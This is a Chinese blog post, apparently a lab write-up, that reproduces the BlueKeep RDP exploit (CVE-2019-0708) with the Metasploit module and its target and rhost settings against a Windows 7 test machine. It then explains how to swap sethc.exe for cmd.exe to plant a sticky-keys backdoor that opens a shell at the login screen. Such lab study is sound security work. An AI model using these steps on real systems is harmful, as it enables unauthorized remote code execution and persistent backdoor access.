CVE-2019-0708远程桌面代码漏洞复现
环境配置
Win2007sp1 ip:192.168.171.136
Kali2021.02 ip:192.168.171.129
Win2007sp1 开启3389端口关闭防火墙
靶机和攻击机能够相互ping通
3 漏洞复现
Kali终端打开msf,并搜索cve-2019-0708或者bulekeep
然后
use 1或者use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Show target
选择target 3
选择攻击的IP地址set rhost ip,这里是192.168.171.136
Win2007出现蓝屏,过后系统记录dump诊断文件并自动重启
若想拿到shell,在show target里再选择一次target 4即可,run后
拿到目标主机后whoami查看该系统,并在c系统盘创建text文件夹
返回win7查看确实创建了text文件夹
下面是进一步利用sechc.exe与cmd.exe互换功能,使其按五次shift后弹出cmd过程
直接改名会提示没有权限,如下图进入属性,高级,更改所有者,后回到安全,添加想给的用户权限即可。
完成后删除sethc.后面cmd添加权限同理即可。最后将cmd命名为sethc即偷梁换柱成功。
Kali里面重新远程连接后,按五次shift即可弹出cmd.
本功法来自三千大道(博客园),由小仙:{Hndreamer}创作,本文章均采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可,转载请注明源功法及作者链接:https://www.cnblogs.com/Hndreamer/p/16382845.html